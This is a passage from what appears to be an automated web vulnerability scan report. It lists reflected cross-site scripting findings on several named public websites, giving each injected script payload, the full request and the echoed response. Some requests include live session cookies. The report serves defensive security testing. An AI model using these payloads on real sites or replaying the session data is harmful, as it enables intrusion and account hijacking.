Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=t98e8mp6ti44euvqvbaaebqt92; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992b0003'-alert(1)-'1acc833ee4/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.80. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-new-tips-to-eat-healthy-0992/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 703dc'-alert(1)-'9d3bb2eafa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ten-new-tips-to-eat-healthy-0992/?703dc'-alert(1)-'9d3bb2eafa6=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=ubi6j622uv5ugce0827esk6ce1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/?703dc'-alert(1)-'9d3bb2eafa6=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.81. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-new-tips-to-eat-healthy-0992/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c267"><a>b4715c683fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ten-new-tips-to-eat-healthy-0992/?5c267"><a>b4715c683fa=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=mt6ivaf56h4ugrfjohfn6m2853; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/?5c267"><a>b4715c683fa=1/" />
...[SNIP]...

2.82. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/basic.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebefc"><script>alert(1)</script>40e8d3d67ea was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/men/basic.jsp?categoryId=358ebefc"><script>alert(1)</script>40e8d3d67ea HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=358ebefc"><script>alert(1)</script>40e8d3d67ea" class="button btn-big-order-now">
...[SNIP]...

2.83. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/silver.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16930"><script>alert(1)</script>a575d339f62 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/men/silver.jsp?categoryId=36916930"><script>alert(1)</script>a575d339f62 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=36916930"><script>alert(1)</script>a575d339f62" class="button btn-big-order-now">
...[SNIP]...

2.84. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/vegetarian.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c36"><script>alert(1)</script>d8a9a1c6bcc was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/men/vegetarian.jsp?categoryId=138463c36"><script>alert(1)</script>d8a9a1c6bcc HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=138463c36"><script>alert(1)</script>d8a9a1c6bcc" class="button btn-big-order-now">
...[SNIP]...

2.85. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/basic.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e29c"><script>alert(1)</script>16d9ed21835 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/women/basic.jsp?categoryId=3538e29c"><script>alert(1)</script>16d9ed21835 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=3538e29c"><script>alert(1)</script>16d9ed21835" class="button btn-big-order-now">
...[SNIP]...

2.86. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/silver.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9767b"><script>alert(1)</script>a8af22fe140 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/women/silver.jsp?categoryId=3649767b"><script>alert(1)</script>a8af22fe140 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to include s
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=3649767b"><script>alert(1)</script>a8af22fe140" class="button btn-big-order-now">
...[SNIP]...

2.87. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/vegetarian.jsp

Issue detail

The value of the categoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f1b5"><script>alert(1)</script>4a1bf5dd8d6 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsps_hmr/catalog/women/vegetarian.jsp?categoryId=3845f1b5"><script>alert(1)</script>4a1bf5dd8d6 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<a href="/jsps_hmr/shop/order_now.jsp?categoryId=3845f1b5"><script>alert(1)</script>4a1bf5dd8d6" class="button btn-big-order-now">
...[SNIP]...

2.88. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tnooz.com
Path:   /2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d4a0"><script>alert(1)</script>805a0da16fc was submitted in the REST URL parameter 5. This input was echoed as 8d4a0\"><script>alert(1)</script>805a0da16fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel8d4a0"><script>alert(1)</script>805a0da16fc/ HTTP/1.1
Host: www.tnooz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 04:10:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.tnooz.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:10:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="post" action="/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel8d4a0\"><script>alert(1)</script>805a0da16fc/#mc_signup_form" id="mc_signup_form">
...[SNIP]...

2.89. http://www.tnooz.com/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tnooz.com
Path:   /2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c72"><script>alert(1)</script>dc131054fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77c72\"><script>alert(1)</script>dc131054fe2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/?77c72"><script>alert(1)</script>dc131054fe2=1 HTTP/1.1
Host: www.tnooz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:09:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.tnooz.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 53837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="post" action="/2010/11/18/news/untangling-the-complexities-of-search-marketing-in-travel/?77c72\"><script>alert(1)</script>dc131054fe2=1#mc_signup_form" id="mc_signup_form">
...[SNIP]...

2.90. http://www.adaptavist.com/display/~mgibson/Versions [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b97a1--><script>alert(1)</script>84bb26c5a42 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/~mgibson/Versions HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b97a1--><script>alert(1)</script>84bb26c5a42
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:56:58 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804618705
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=5D915CD7D5137B436017BEC6C7FE29DF; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 18184

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b97a1--><script>alert(1)</script>84bb26c5a42'
layout : 'Builder Layout: CLEANGLOBAL'
layoutId : 'CLEANGLOBAL'
spaceName : 'Mark Gibson'
currentURL : '/display/~mgibson/Versions'
contextPath : ''
action name : '$themebuilder.getAction
...[SNIP]...

2.91. http://www.adotas.com/2010/12/are-you-a-search-geek-prove-it/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/are-you-a-search-geek-prove-it/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 298b0<script>alert(1)</script>8593a9bba92 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2010/12/are-you-a-search-geek-prove-it/ HTTP/1.1
Host: www.adotas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)298b0<script>alert(1)</script>8593a9bba92
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:58:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 05:58:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
-size: 6px;
   line-height: 8px;
   height: 8px;
   background: #ff0000;
   border: 1px solid #ff0000;
}
a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)298b0<script>alert(1)</script>8593a9bba92*/
.wp-polls-loading {
   display:none;
}
</style>
...[SNIP]...

2.92. http://www.cbsalary.com/quizzes/fun-jobs/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsalary.com
Path:   /quizzes/fun-jobs/

Issue detail

